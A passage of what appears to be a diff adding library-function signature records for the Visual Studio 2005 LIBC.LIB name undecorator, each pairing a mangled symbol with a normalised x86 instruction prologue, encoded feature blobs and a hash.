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,[],18f17d48f4883d00cab42b96a99c7f26c6132b94,VS2005,LIBC.LIB
+??0DName@@QAE@PAVDNameNode@@@Z,"MOV R32,R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nAND DWORD PTR DS:[R32+CONST],CONST\nMOV DWORD PTR DS:[R32],R32\nRETN CONST",578p3gAAAAAAAAAA,[],3fc3ed117052e09b43a6598f3400bd8606afd567,VS2005,LIBC.LIB
+?getScopedName@UnDecorator@@CA?AVDName@@XZ,"MOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32\nLEAVE\nRETN",JPOsMjvDl2MAAAAA2M0EpvaBHB4+lmzb1nzuDJdKnYAAAAAAPpZs29jNBKYk86wy2M0EplA0OLwH/YlBWvBzQPaBHB72gRweB/2JQZdKnYAAAAAAl0qdgDvDl2MAAAAAUbyTUjvDl2MAAAAA9oEcHvaBHB7YzQSm9oEcHtjNBKYk86wyO8OXYwAAAAAAAAAAUDQ4vFG8k1LWfO4M,[],0e64e6b9b5ab64d32ee1fe3d32a5a1960db65082,VS2005,LIBC.LIB
+??0DName@@QAE@PAV0@@Z,"MOV R32,DWORD PTR DS:[R32+CONST]\nMOV DWORD PTR DS:[R32],R32\nNEG R32\nSBB R32,R32\nAND R8,CONST\nADD CONST2,CONST\nXOR R32,R32\nAND R32,CONST",/ET4QAWt9W4AAAAAJu7hZcRVTi8AAAAAzEoy0Sbu4WUsnPIsxFVOLwWt9W4AAAAABa31bgAAAAAAAAAALJzyLMRVTi8AAAAAcEzRv/xE+EDMSjLR,[],1f71a4667424fe9c368bb02abfd8d830fad7ce1a,VS2005,LIBC.LIB
+?getLexicalFrame@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nPUSH R32",Byv8WgAAAAAAAAAA,2M0EptZ87gxb0BXg49K2H6Mu1aoH/YlBZti2hwAAAAAAAAAAW9AV4Af9iUGeGr5SB/2JQYKL19sAAAAA1nzuDIKL19sAAAAAW9AV4Af9iUFb0BXgA9QWgVvQFeDWfO4MW9AV4Cbu4WVb0BXggovX22bYtocAAAAAu/eunmbYtocAAAAAW9AV4Cbu4WW7966enhq+UlvQFeAAAAAAW9AV4OPSth/YzQSmJu7hZVvQFeAAAAAAoy7VqmbYtocAAAAA,3f4d792c91ca59123b4118e88f2277d761df0d9e,VS2005,LIBC.LIB
+?getString@charNode@@UBEPADPADH@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",9rrcoQAAAAAAAAAAJu7hZfa63KEAAAAAbkLi/Pa63KEAAAAAFjgIIibu4WXNLBGmzSwRpibu4WVuQuL8,[],e50c305846d839487a60cdf83c7e34d1cc98ed9e,VS2005,LIBC.LIB
+??YDName@@QAEAAV0@W4DNameStatus@@@Z,"PUSH R32\nPUSH R32\nMOV R32,R32\nCALL CONST\nMOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",UaffY98TwOXbmuiP6Hg29bmPfRi7tlwscug6RUFF0BtRp99juY99GF8iGcAAAAAA25roj98TwOUAAAAAJVm7enLoOkUAAAAAu7ZcLLmPfRi7tlwsXyIZwAAAAAAAAAAAu7ZcLLmPfRjMSjLRJu7hZXLoOkUAAAAAQUXQG98TwOUAAAAAzEoy0Sbu4WUlWbt63xPA5V8iGcAgczaYIHM2mF8iGcAAAAAA,[],22d7c9d73dc3fefad37b348c76f799a67444b51c,VS2005,LIBC.LIB
+?getReturnType@UnDecorator@@CA?AVDName@@PAV2@@Z,"PUSH DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nPOP R32\nPOP R32\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32",+JjmJAAAAAAAAAAAKJfobAAAAAAAAAAArOVo3yiX6GwAAAAAF80dXviY5iSs5Wjf,[],9bdb0fe7ac49183d4b709aed1b5543d493a4aa00,VS2005,LIBC.LIB
+?getNumberOfDimensions@UnDecorator@@CAHXZ,"MOVSX R32,R8\nSHL R32,CONST\nINC R32\nLEA R32,DWORD PTR DS:[R32+R32+CONST]\nMOV DWORD PTR DS:[0],R32\nMOV R8,BYTE PTR DS:[R32]\nJMP SHORT CONST",Ju7hZVvQFeAAAAAAW9AV4FxHKpjYzQSmUs42lQAAAAAAAAAA2M0EplLONpVb0BXgW9AV4Cbu4WVb0BXgXEcqmAGhdbMko5lcW9AV4CSjmVxb0BXgW9AV4Cbu4WUihg3PW9AV4CSjmVyZuN+YIoYNzwAAAAAAAAAAmbjfmFvQFeAAAAAAJKOZXAGhdbMAAAAAAqeVc1vQFeBSzjaVAaF1swAAAAAAAAAA,[],fb15255aa0b2232dcc1dc87835a6ed78e8e412f5,VS2005,LIBC.LIB
+??4DName@@QAEAAV0@PBD@Z,"PUSH R32\nMOV R32,R32\nPUSH DWORD PTR SS:[ESP+CONST]\nAND DWORD PTR DS:[R32+CONST],CONST\nCALL CONST\nPOP R32\nPUSH R32\nMOV R32,R32",7PhzQgAAAAAAAAAA,FMSIagGhdbOdoIgzAaF1swAAAAAAAAAAm+/JPhTEiGoAAAAAnaCIMxTEiGoAAAAA,4d9bc494cf68506e2723888cccdd0b289ace2f05,VS2005,LIBC.LIB
+?getTypeEncoding@UnDecorator@@CAHXZ,"MOVSX R32,R8\nMOV R32,CONST\nSUB R32,CONST\nINC R32\nOR R32,R32\nTEST R8,CONST\nMOV DWORD PTR DS:[0],R32\nJCC CONST",p+n+4l1YHfgAAAAAJPTvpF1YHfgAAAAAam29FK6bQtium0LYJPTvpKgTSsAAAAAAcug6RVcHs0oA82vs8ZXNXnLoOkXihHJ3SDQjuwAAAAAAAAAAEdHDzK6bQtium0LYVwezSl1YHfgAAAAAW9AV4GfKxLxb0BXg4oRyd3LoOkUXzyVPrptC2K6bQtgpS/OUW9AV4FcHs0pb0BXgF88lT5dxUZ5y6DpFcug6RXWBokMA82vsW9AV4E9BHpBb0BXgAPNr7F1YHfgAAAAAcug6RST076Sn6f7iW9AV4DyyQn6um0LYdYGiQ11YHfgAAAAAp+n+4nRtM8UAAAAArptC2JdxUZ48skJ+XVgd+KqT3bLihHJ3JPTvpHRtM8UAAAAAPLJCfqqT3bIAAAAAcug6RVcHs0oA82vsPLJCfnRtM8UAAAAAl3FRnqqT3bIAAAAA4oRyd3LoOkXihHJ3VwezSnRtM8UAAAAAAmBmtaqT3bIAAAAAJPTvpE79CxQAAAAAPLJCfnRtM8UAAAAAF88lT5dxUZ48skJ+qLu1N079CxQAAAAAcug6RZt2RtsA82vsAPNr7HRtM8UAAAAATv0LFKqT3bJxaVDhAPNr7HRtM8UAAAAAqpPdsgAAAAAAAAAAT0EekHRtM8UAAAAAm3ZG2y0M2vYAAAAAm3ZG23RtM8UAAAAAcWlQ4Sbu4WWbdkbbVwezSnRtM8UAAAAAPLJCfqqT3bIAAAAA8SwwDqqT3bIAAAAArptC2JdxUZ5b0BXgdG0zxaqT3bIAAAAAZ8rEvBSXRV6bdkbbcug6RWZ5MTU8skJ+KUvzlKi7tTck9O+kAPNr7F1YHfgAAAAAPLJCfqqT3bIAAAAArptC2AJgZrWum0LYqBNKwHLoOkXihHJ3Ju7hZS0M2vYAAAAA4oRydzyyQn4XzyVPLQza9nLoOkW7tlwsZnkxNaqT3bIAAAAArptC2AJgZrXLQqiKu7ZcLHLoOkVO/QsUSJIQPRHRw8xqbb0UrptC2K6bQtjYTk9Fm3ZG26A2uH4AAAAATv0LFJdxUZ5y6DpFy0KoipdxUZ5INCO7FJdFXvGVzV4k9O+k2E5PRfEsMA6um0LYoDa4fvGVzV4k9O+kcug6RST076Sn6f7i,[],bc37531d740215865bd628bec924e4ecd06050e6,VS2005,LIBC.LIB
+?getLastChar@charNode@@UBEDXZ,"MOV R8,BYTE PTR DS:[R32+CONST]\nRETN",NOKEugAAAAAAAAAA,[],b39828837f30496558c8b2c3879d67cfb7c8e5b0,VS2005,LIBC.LIB
+?getFunctionIndirectType@UnDecorator@@CA?AVDName@@ABV2@@Z,"LEA R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nNOT R32\nTEST R8,CONST\nJCC CONST",DkwnDTCWFwZy6DpFMJYXBnGGBjOnZ+UGLYZTnr3JHzjQhKFqDjGUY8RPITbMGxZltsaiKDCWFwZy6DpF0IShaqdn5QbuCG04p2flBq6bQtgAAAAAW9AV4HlDYYKum0LYzBsWZZ8KjEsAAAAAxE8hNlIuahXYyNW+cug6RV1YHfi7tlwsvckfOBGmqIUAAAAAcug6RTCWFwb4FZZ8IYd5Y079CxRdWB34XVgd+L3JHzhzj262nwqMS1IuahXYyNW+1IKvS+W/+YIAAAAATv0LFL3JHzhzj262rptC2DcUUJ/CXwenc49utq6bQtgk9lms2MjVvrbGoigOTCcNKicYS+W/+YIAAAAAwl8Hpw4xlGPtaSpicug6RQf9iUEqJxhLrptC2L3JHzh5Q2GC5b/5gnOiGWEAAAAAN1aOhdSCr0sthlOeeUNhgnLoOkWP4s79cYYGMwf9iUEqJxhLp2flBnLoOkUAAAAAS2gOD+W/+YIAAAAA7ghtODcUUJ/CXwenB/2JQRGmqIUAAAAAEaaohXOiGWEAAAAAJPZZrDdWjoUzMbF5W9AV4K6bQthb0BXgc6IZYQAAAAAAAAAAj+LO/UtoDg95Q2GCMzGxeTi+QwwAAAAA7WkqYjcUUJ8AAAAAeUNhgl1YHfjEkqZou7ZcLE79CxRdWB34NxRQn8RPITbMGxZlOL5DDNSCr0sthlOeUi5qFbbGoigOTCcNxJKmaCGHeWMAAAAA+BWWfHGGBjOnZ+UGS2gOD+W/+YIAAAAAmw1ptlvQFeBLaA4P,[],011dc2e0956b05cbdd616c74135fdae2958bbaef,VS2005,LIBC.LIB
+?getEnumType@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOV R8,BYTE PTR DS:[R32]\nTEST R8,R8",1nzuDBGmqIUAAAAAB/2JQRGmqIUAAAAAEaaohWbYtocAAAAABN6aZtZ87gxINCO7AFa66Af9iUEE3ppmZti2hwAAAAAAAAAASDQjuwAAAAAAAAAA,[],43abaebde4487a7218ff7da144f7eb83f80ffc9b,VS2005,LIBC.LIB
+?getVfTableType@UnDecorator@@CA?AVDName@@ABV2@@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEAVE\nRETN",1yfVsPP6Pk0k86wyLYXPT/P6Pk0k86wytweXCFA0OLwk1zdPJPOsMvP6Pk0AAAAAUDQ4vPP6Pk2BljnagZY52gAAAAAAAAAA8/o+TQAAAAAAAAAA2M6Ydy2Fz09BvoZRJNc3T6V/b4TYzph31NIK8VA0OLzYzph3UDQ4vKV/b4TYzph3Qb6GUVA0OLz2gRweR3w/elA0OLz2gRwe2M6Yd6V/b4SPB9hJpX9vhFA0OLz2gRwejwfYSUd8P3oAAAAA2M6Yd1A0OLxtzuST9oEcHlA0OLzYzQSmUDQ4vC2Fz08thc9P2M0EplA0OLy3B5cIbc7kk/P6Pk3Yzph3LYXPT9cn1bA6DEuDOgxLg/P6Pk0k86wy,[],f39b5e642a654cb282317001d52ecc012cdf2260,VS2005,LIBC.LIB
+?getTemplateName@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nCMP BYTE PTR DS:[R32],CONST\nJCC CONST",01WNigAAAAAAAAAA502siwAAAAAAAAAA0kQiKudNrItF+hz2VyLaqslhUsomuhK5JroSuQAAAAAAAAAAw8Tk/OdNrIvSRCIqRfoc9tNVjYpXItqqyWFSygAAAAAAAAAA,[],a8d2dac4fcd0ca572cc738f8faa87f1d97f5b944,VS2005,LIBC.LIB
+?getVCallThunkType@UnDecorator@@CA?AVDName@@XZ,"INC DWORD PTR DS:[0]\nPUSH CONST\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nJMP SHORT CONST",2M0EpqXd4DjWfO4M1nzuDBGmqIUAAAAAEaaohWbYtocAAAAAJrgSAGbYtocAAAAApd3gOGbYtocAAAAAZti2hwAAAAAAAAAAA9QWgSa4EgDYzQSm,[],7ea5161e2aaaf75655d2212ad7d7c0b64f074baf,VS2005,LIBC.LIB
+?getArgumentList@UnDecorator@@CA?AVDName@@XZ,"MOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nPOP R32\nPOP R32\nLEAVE",rptC2Huuzbdy6DpFe67NtwAAAAAAAAAAzsq+5av85ba7tlwsq/zltiIAyZVrhEljcug6RR9QbawNzMABIgDJldJEIioAAAAA0kQiKnuuzbeZuqt9DczAAY/izv0AAAAAu7ZcLKv85bbGP9T+mbqrfXuuzbeum0LYH1BtrPGYmejOyr7la4RJYyIAyZXcIWRx4uS9cnuuzbeZuqt98ZiZ6AAAAAAAAAAAxj/U/nv3q44AAAAAj+LO/fGYmejOyr7le/erjtJEIioAAAAA3CFkcdJEIioAAAAA,[],6a56b91e4025515b3c5b9300e659fa6c74229eb7,VS2005,LIBC.LIB
+?getString@pcharNode@@UBEPADPADH@Z,"MOV R32,DWORD PTR DS:[R32+CONST]\nXOR R32,R32\nCMP R32,R32\nJCC CONST",i4p5eva63KHf6hBM9rrcoQAAAAAAAAAA3+oQTPa63KFy6DpFcug6Rfa63KHGIMxBxiDMQfa63KEAAAAA21puMouKeXom7uFlJu7hZYuKeXoAAAAA,[],f0217684340224a50420c6f276311124ffee9398,VS2005,LIBC.LIB
+?length@DName@@QBEHXZ,"PUSH R32\nPUSH R32\nMOV R32,R32\nXOR R32,R32\nCALL CONST\nTEST R32,R32\nJCC CONST",xmv3fdV/Hhw17yIGQwoWv9V/HhzGa/d9cug6RdV/Hhw17yIG1X8eHAAAAAAAAAAANe8iBnLoOkUAAAAA,[],597f04d13e719aaed47e7e311f5f32288210fcfd,VS2005,LIBC.LIB
+??0DNameNode@@IAE@XZ,"MOV R32,R32\nAND DWORD PTR DS:[R32+CONST],0\nMOV DWORD PTR DS:[R32],0\nRETN",TIWDOgAAAAAAAAAA,[],629f7a8505cb465a9b48670cd598c9620b05c4ca,VS2005,LIBC.LIB
+??0DName@@QAE@PBD@Z,"PUSH R32\nMOV R32,R32\nPUSH R32\nMOV R32,DWORD PTR SS:[ESP+CONST]\nAND DWORD PTR DS:[R32],0\nAND DWORD PTR DS:[R32+CONST],CONST\nTEST R32,R32\nJCC CONST",XyIZwAAAAAAAAAAAGNXmnwAAAAAAAAAAWh151V8iGcAY1eaf,[],946a256afc86e40e07ae46a8a442c68911ed62c0,VS2005,LIBC.LIB
+??BUnDecorator@@QAEPADXZ,"POP R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOV R32,DWORD PTR SS:[EBP+CONST]\nAND R32,CONST\nCMP CONST2,CONST",rN+z5gAAAAAAAAAAGAMwdgAAAAAAAAAA5JqU9GFi/z0nD3USLmNswsfLjyXkmpT0oFMB7Lu2XCz7c3qkPoOgCW6DObkAAAAAgXrzBKBTAeys37PmW9AV4GFi/z0nD3USdGnePhgDMHZMn8RnOmU1PAAAAAAAAAAAYWL/PaBTAeys37Pm+3N6pBBCWrq7tlwsJw91ElvQFeA+g6AJJw91EmFi/z1xLZBUS6l9YBgDMHZMn8Rnx8uPJaBTAeys37PmboM5uaBTAeys37PmcS2QVIF68wQAAAAAu7ZcLHRp3j4QQlq6EEJaukupfWAAAAAATJ/EZzplNTwYAzB2,[],a49994b144a856de93eeb8b869e22a35c7cc9de9,VS2005,LIBC.LIB
+?getECSUDataType@UnDecorator@@CA?AVDName@@XZ,"XOR R32,R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nINC DWORD PTR DS:[0]\nSUB R32,0\nJCC CONST",UDQ4vCEj0aUSI8tUDQwOIAc9NYgAAAAA5LIpfbI3aEIAAAAAW9AV4J0a3e4NDA4gu7ZcLLT10WmX2nuUddp9ptQ3kw0AAAAAsjdoQiEj0aUSI8tUBz01iHXafaa7tlwsEiPLVCEj0aUAAAAAnRrd7nXafaa7tlwsUENAEp0a3e5b0BXg5LIpfbI3aEIAAAAAtPXRaSEj0aUSI8tUl9p7lOSyKX2X2nuUl9p7lOSyKX2X2nuU1DeTDQAAAAAAAAAAl9p7lFA0OLz+7VyNISPRpdQ3kw0AAAAA/u1cjVA0OLwAAAAA,[],16696d4603209726a41283a56a79fa6f07a54e77,VS2005,LIBC.LIB
+??AReplicator@@QBEABVDName@@H@Z,"MOV R32,DWORD PTR SS:[ESP+CONST]\nTEST R32,R32\nJCC CONST",92ZeL/a63KEAAAAA9rrcoQAAAAAAAAAAu7ZcLPdmXi8PNZEUDzWRFBFkM4Ny6DpFcug6RRFkM4NkmIGFZJiBhfa63KEAAAAAEWQzg/a63KEAAAAAFjgIIvdmXi+7tlws,[],8331dd51e4a673523638266cfef505d3492072cf,VS2005,LIBC.LIB
+?getTemplateArgumentList@UnDecorator@@CA?AVDName@@XZ,"POP R32\nPUSH R32\nLEA R32,DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[0]\nSUB R32,R32\nCMP R32,CONST\nJCC CONST",VG8IFYHw0FBrhEljM2DnjJdKnYAAAAAAivrwPDfULVMAAAAAa4RJY4Hw0FASqngNt0hMzbuzUaWum0LYA8pLJruzUaWum0LYW9AV4K6bQtivIf/0ryH/9K6bQtgfSOkKEqp4DQPKSya7s1GlH0jpCr6R/7EAAAAAgfDQUAPKSya7s1GlopxREAPKSya7s1GlrptC2LuzUaWchlE4rptC2ECMpnT4HUbSnIZROJIjY7Ljoqt8ARQ+5G8bAD8AAAAA46KrfAKRwOMAAAAAu7NRpQAAAAAAAAAA+B1G0gEUPuQrPtqEkiNjsgmVwAa7tlwsApHA4wmVwAa7tlwsu7ZcLAmVwAatiiXKKz7ahIr68DwQQlq6rYolyqKcURAAAAAAN9QtU28bAD8AAAAAQIymdIHw0FBrhElj9IjVQbuzUaW3SEzNCZXABlvQFeAzYOeMvpH/sYHw0FBrhEljbxsAP4Hw0FBrhEljEEJaulRvCBUAAAAAl0qdgFRvCBUAAAAA,[],485cdb0c7804b52d16eba650ca6d51023d91e7bc,VS2005,LIBC.LIB
+?isUDTThunk@DName@@QBEHXZ,"PUSH R32\nMOV R32,R32\nCALL CONST\nTEST R32,R32\nJCC CONST",Jw91Ek+LzAq0bZIRT4vMCgAAAAAAAAAAWn1BPk+LzAonD3UStG2SEQAAAAAAAAAA,[],69166f66143792aa9aa1221f7821af70e2694d0c,VS2005,LIBC.LIB
+??0DName@@QAE@AAPBDD@Z,"PUSH R32\nMOV R32,R32\nPUSH DWORD PTR SS:[EBP+CONST]\nCALL CONST\nMOV R32,DWORD PTR DS:[R32]\nMOV R8,BYTE PTR DS:[R32]\nTEST R8,R8\nJCC CONST",W9AV4PtzeqRb0BXgW9AV4AAW3237c3qk+3N6pBduNtIAFt9tABbfbVlFqJMESH2fWUWokwRIfZ9b0BXgBEh9n4Rwhx0ar+ucGq/rnOOiq3yEwypqLyb35UvTtWnSDf2mhMMqajdaJrQAAAAAF2420ihdv6sAAAAAS9O1aShdv6sAAAAAKF2/qzdaJrQAAAAA0g39pgDza+woXb+rN1omtAAAAAAAAAAAKF2/q1lFqJMAAAAA46KrfDdaJrQAAAAAhHCHHTdaJrQA82vsW9AV4AAW321b0BXgAPNr7Chdv6sAAAAAW9AV4AAW321b0BXgW9AV4FvQFeBb0BXgW9AV4AAW321b0BXgW9AV4FvQFeBb0BXgW9AV4AAW321b0BXg,[],55bcb03cbabe622fa45cca2436eff8537fc1eff6,VS2005,LIBC.LIB
+??YDName@@QAEAAV0@PBD@Z,"PUSH CONST\nPUSH CONST\nMOV R32,0\nCALL CONST\nTEST R32,R32\nJCC CONST",YP6E6V8iGcAAAAAA25roj18iGcAAAAAAVe06Ml8iGcAAAAAAzEoy0Sbu4WXLnWhQYUWyHF8iGcAUxIhqy51oUGD+hOkAAAAAUaffY1XtOjLMSjLRXyIZwAAAAAAAAAAAFMSIal8iGcBSaOpbJu7hZWD+hOkAAAAAUmjqW1Gn32PbmuiP,[],e0acc6e192ad488514c0b3971ae59849e7da1408,VS2005,LIBC.LIB
+?getTemplateConstant@UnDecorator@@CA?AVDName@@XZ,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nMOV R32,DWORD PTR DS:[0]\nMOVSX R32,BYTE PTR DS:[R32]\nINC DWORD PTR DS:[0]\nSUB R32,0\nJCC CONST",Dmtyvylmt0xO/QsUVnJxOIKL19sAAAAANlgCoWbYtocAAAAAuPdp3eeN1mi9yR84govX22bYtocAAAAAn1RKCVySL7UAAAAAvckfOLdTzBEAAAAATv0LFFKaRj5ikSys543WaBjxG7iYWU9Vuk1wE+W/+YIAAAAAYpEsrC2Fz09ikSysYpEsrJdVuhhO/QsUmFlPVRfhV88AAAAATv0LFL3JHzj4HUbSUppGPmbYtocAAAAA+B1G0rpNcBMLIC/dl1W6GProjuSlf2+E5b/5gmbYtocAAAAAGPEbuOW/+YIAAAAAKWa3TAAAAAAAAAAAF+FXz+W/+YIAAAAA+uiO5AAAAAAAAAAAt1PMEQAAAAAAAAAACyAv3bpNcBNWcnE4Zti2hwAAAAAAAAAAXJIvteW/+YIAAAAApX9vhProjuS492ndLYXPT59USgk2WAKh,[],c1db548d870b0fe66824dee7929ee6c48a96256e,VS2005,LIBC.LIB
+??0DName@@QAE@W4DNameStatus@@@Z,"MOV R32,DWORD PTR DS:[R32+CONST]\nPUSH CONST\nMOV R32,R32\nPUSH CONST\nXOR R32,R32\nMOV R32,0\nAND R32,CONST\nXOR R32,R32",SqArJF8iGcAAAAAAJu7hZWa99zkAAAAAZr33OSbu4WXbmuiP25rojxspN2sAAAAAXyIZwAAAAAAAAAAAqBvUdSbu4WW7tlwsJu7hZRspN2sAAAAAGyk3a18iGcBKoCskDczAAWa99zkAAAAAu7ZcLCbu4WUNzMAB,[],4090b87e3db92a2bcab24188c47a05957d0e0fc5,VS2005,LIBC.LIB
+??H@YA?AVDName@@W4DNameStatus@@ABV0@@Z,"PUSH EBP\nMOV EBP,ESP\nSUB ESP,CONST\nPUSH DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nPUSH DWORD PTR SS:[EBP+CONST]",M//RUwAAAAAAAAAA,DczAAWa99zkAAAAAu7ZcLCbu4WUNzMABSqArJF8iGcAAAAAAJu7hZWa99zkAAAAAZr33OSbu4WXbmuiP25rojxspN2sAAAAAXyIZwAAAAAAAAAAAqBvUdSbu4WW7tlwsJu7hZRspN2sAAAAAGyk3a18iGcBKoCsk,3f21f16c7830f7076cc9ff112a81d4b39b6373b1,VS2005,LIBC.LIB
+?getLastChar@pcharNode@@UBEDXZ,"MOV R32,DWORD PTR DS:[R32+CONST]\nTEST R32,R32\nJCC CONST",+OsIdgAAAAAAAAAALlW5/vjrCHZblPp5W5T6eQAAAAAAAAAA,[],d73836153618eb2cca360996d50ffa63b1ebad3e,VS2005,LIBC.LIB
+??HDName@@QBE?AV0@W4DNameStatus@@@Z,"MOV R32,DWORD PTR SS:[EBP+CONST]\nLEA R32,DWORD PTR SS:[EBP+CONST]\nPUSH R32\nCALL CONST\nMOV R32,DWORD PTR SS:[EBP+CONST]\nLEAVE\nRETN CONST",bj6cPgAAAAAAAAAAN9QtU24+nD4AAAAAwYzu724+nD4AAAAAblohxsGM7u831C1T,[],0f2cdb969df365a6ec7da837af0fd5f2ce2bb2e0,VS2005,LIBC.LIB
